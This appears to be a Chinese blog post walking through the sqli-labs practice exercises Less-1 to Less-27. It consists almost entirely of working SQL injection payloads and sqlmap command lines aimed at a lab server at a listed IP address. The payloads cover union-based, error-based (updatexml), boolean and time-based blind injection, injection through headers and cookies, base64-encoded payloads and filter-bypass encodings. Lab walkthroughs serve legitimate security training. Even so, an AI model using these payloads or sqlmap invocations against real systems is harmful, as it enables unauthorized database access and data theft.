sqli-labs(Less1-27)

发表于 | 分类于 |

源码链接:https://github.com/Audi-1/sqli-labs

less1

http://103.42.28.252/day2/Less-1/?id=2123%27union%20select%201,flag,3,4%20from%20flag.flag%23

http://103.42.28.252/day2/Less-1/?id=2123%27union%20select%201,flag,3,4%20from%20flag%23

http://103.42.28.252/day2/Less-1/?id=1' and updatexml(1,concat(0x5b,(mid((select flag from flag),1,32)),0x5d),1) %23

sqlmap -u "http://103.42.28.252/day2/Less-1/?id=1" -p "id"

Less2

http://103.42.28.252/day2/Less-2/?id=2123%20union%20select%201,flag,3,4%20from%20flag.flag%23

http://103.42.28.252/day2/Less-2/?id=2123%20union%20select%201,flag,3,4%20from%20flag%23

http://103.42.28.252/day2/Less-2/?id=1%20and%20updatexml(1,concat(0x5b,(mid((select flag from flag),1,32)),0x5d),1)%23

sqlmap -u "http://103.42.28.252/day2/Less-2/?id=1" -p "id"

Less3

http://103.42.28.252/day2/Less-3/?id=12312') union select 1,flag,3,4 from flag%23

sqlmap -u "http://103.42.28.252/day2/Less-3/?id=1" -p "id"

Less4

http://103.42.28.252/day2/Less-4/?id=1123") union select 1,flag,3 from flag%23

sqlmap -u "http://103.42.28.252/day2/Less-4/?id=4" -p "id"

Less5

http://103.42.28.252/day2/Less-5/?id=1' and updatexml(1,concat(0x5b,(mid((select flag from flag),1,32)),0x5d),1) %23


sqlmap -u "http://103.42.28.252/day2/Less-5/?id=1" -p "id"

Less6

http://103.42.28.252/day2/Less-6/?id=1" and updatexml(1,concat(0x5b,(mid((select flag from flag),1,32)),0x5d),1) %23

sqlmap -u "http://103.42.28.252/day2/Less-6/?id=1" -p "id"

Less7

http://103.42.28.252/day2/Less-7/?id=1')) union select 1,2,3 into outfile '/tmp/1.txt'%23

sqlmap -u "http://103.42.28.252/day2/Less-6/?id=1" -p "id"  //只能采取盲注

id=1 => (('1'))
id=1')) and 1=1 #  => (('1')) and 1=1 #'))
id=1') AND SLEEP(5) AND ('naou'='naou => (('1') AND SLEEP(5) AND ('naou'='naou'))

Less8

http://103.42.28.252/day2/Less-8/?id=1'and ascii(substr((select flag from flag.flag),1,1)) > 1%23

http://103.42.28.252/day2/Less-8/?id=1'and if((ascii(substr((select flag from flag.flag),1,1)) = 1),0,sleep(5))%23

sqlmap -u "http://103.42.28.252/day2/Less-8/?id=1" -p "id"

Less9

http://103.42.28.252/day2/Less-9/?id=1'and if((ascii(substr((select flag from flag.flag),1,1)) = 1),0,sleep(5))%23

sqlmap -u "http://103.42.28.252/day2/Less-9/?id=1" -p "id" 

//看不见的布尔盲注

Less10

http://103.42.28.252/day2/Less-10/?id=1"and if((ascii(substr((select flag from flag.flag),1,1)) = 1),0,sleep(5))%23

sqlmap -u "http://103.42.28.252/day2/Less-10/?id=1" -p "id" --level 5

//看不见的布尔盲注

Less11

http://103.42.28.252/day2/Less-11/

uname=123&passwd=123' and updatexml(1,concat(0x5b,(mid((select flag from flag.flag),1,32)),0x5d),1)#

uname=123' and updatexml(1,concat(0x5b,(mid((select flag from flag.flag),1,32)),0x5d),1)#&passwd=123

sqlmap -u "http://103.42.28.252/day2/Less-11/" --data "uname=1&passwd=1" -p "passwd"

Less12

http://103.42.28.252/day2/Less-12/

uname=123&passwd=123") and updatexml(1,concat(0x5b,(mid((select flag from flag.flag),1,32)),0x5d),1)#

sqlmap -u "http://103.42.28.252/day2/Less-12/" --data "uname=1&passwd=1" -p "passwd"

Less13

http://103.42.28.252/day2/Less-13/

uname=123&passwd=123') and updatexml(1,concat(0x5b,(mid((select flag from flag.flag),1,32)),0x5d),1)#

sqlmap -u "http://103.42.28.252/day2/Less-13/" --data "uname=1&passwd=1" -p "passwd"

Less14

http://103.42.28.252/day2/Less-14/

uname=123&passwd=123" and updatexml(1,concat(0x5b,(mid((select flag from flag.flag),1,32)),0x5d),1)#

sqlmap -u "http://103.42.28.252/day2/Less-14/" --data "uname=1&passwd=1" -p "passwd"

Less15

http://103.42.28.252/day2/Less-15/

uname=admin&passwd=admin'and ascii(substr((select flag from flag.flag),1,1)) > 1%23

sqlmap -u "http://103.42.28.252/day2/Less-15/" --data "uname=admin&passwd=admin" -p "passwd"

Less16

http://103.42.28.252/day2/Less-16/

uname=admin&passwd=admin") and ascii(substr((select flag from flag.flag),1,1)) > 1%23

sqlmap -u "http://103.42.28.252/day2/Less-16/" --data "uname=admin&passwd=" -p "passwd" --prefix "admin\")"

Less17

http://103.42.28.252/day2/Less-17/

uname=admin1&passwd=admin1' and updatexml(1,concat(0x5b,(mid((select flag from flag.flag),1,32)),0x5d),1) %23

sqlmap -u "http://103.42.28.252/day2/Less-17/" --data "uname=admin1&passwd=admin1" -p "passwd"

Less18

http://103.42.28.252/day2/Less-18/

uname=admin&passwd=admin

'and updatexml(1,concat(0x5b,(mid((select flag from flag.flag),1,32)),0x5d),1),0,1)#


sqlmap -u "http://103.42.28.252/day2/Less-18/" --data "uname=admin&passwd=admin" -p "user-agent" --suffix " or '"

Less19

http://103.42.28.252/day2/Less-19/

uname=admin&passwd=admin

'or updatexml(1,concat(0x5b,(mid((select flag from flag.flag),1,32)),0x5d),1) or'

sqlmap -u "http://103.42.28.252/day2/Less-19/" --data "uname=admin&passwd=admin" -p "referer" --suffix " or '"

Less20

http://103.42.28.252/day2/Less-20/

uname=admin&passwd=admin

uname='or updatexml(1,concat(0x5b,(mid((select flag from flag.flag),1,32)),0x5d),1) or'

sqlmap -u "http://103.42.28.252/day2/Less-20/" --data "uname=admin&passwd=admin" --cookie="uname=123" -p "cookie"

Less21

http://103.42.28.252/day2/Less-21/

uname=admin&passwd=admin

uname=CidvciB1cGRhdGV4bWwoMSxjb25jYXQoMHg1YiwobWlkKChzZWxlY3QgZmxhZyBmcm9tIGZsYWcuZmxhZyksMSwzMikpLDB4NWQpLDEpIG9yJw==

sqlmap -u "http://103.42.28.252/day2/Less-21/" --data "uname=admin&passwd=admin" --cookie="uname=123" -p "cookie" --tamper "base64encode.py"

Less22

http://103.42.28.252/day2/Less-22/

uname=admin&passwd=admin

uname=Im9yIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDViLChtaWQoKHNlbGVjdCBmbGFnIGZyb20gZmxhZy5mbGFnKSwxLDMyKSksMHg1ZCksMSkgb3Ii

 sqlmap -u "http://103.42.28.252/day2/Less-22/" --data "uname=admin&passwd=admin" --cookie="uname=123" -p "cookie" --tamper "base64encode.py"

Less23

http://103.42.28.252/day2/Less-23/?id=1'and updatexml(1,concat(0x5b,(mid((select flag from flag.flag),1,32)),0x5d),1) and'1'='1

sqlmap -u "http://103.42.28.252/day2/Less-23/?id=1" -p "id"

Less24

Less25

http://103.42.28.252/day2/Less-25/?id=123123%27%20union%20select%201,2,flag%20from%20flag.flag%20%23

sqlmap -u "http://103.42.28.252/day2/Less-25/?id=1" -p "id"

Less25a

http://103.42.28.252/day2/Less-25a/?id=123123%20union%20select%201,2,flag%20from%20flag.flag%20%23

sqlmap -u "http://103.42.28.252/day2/Less-25/?id=1" -p "id"

Less26

http://103.42.28.252/day2/Less-26/?id='%a0union%a0select%a01,flag,3%a0from%a0flag.flag%a0where%a01=1%a0%26%26%a0'1'='1

sqlmap 0a

Less26a

http://103.42.28.252/day2/Less-26a/?id=%27)%a0union%a0select%a01,flag,3%a0from%a0flag.flag%a0where%a01=1%a0%26%26(%a0%271%27=%271

sqlmap 0a

Less27

http://103.42.28.252/day2/Less-27/?id='uniOn%0aselEct%0a1,flag,3%0afrom%0aflag.flag%0awhere%0a'1'='1

Less27a

http://103.42.28.252/day2/Less-27a/?id=23123"%0auniOn%0aselEct%0a1,flag,3%0afrom%0aflag.flag%0awhere%0a"1"="1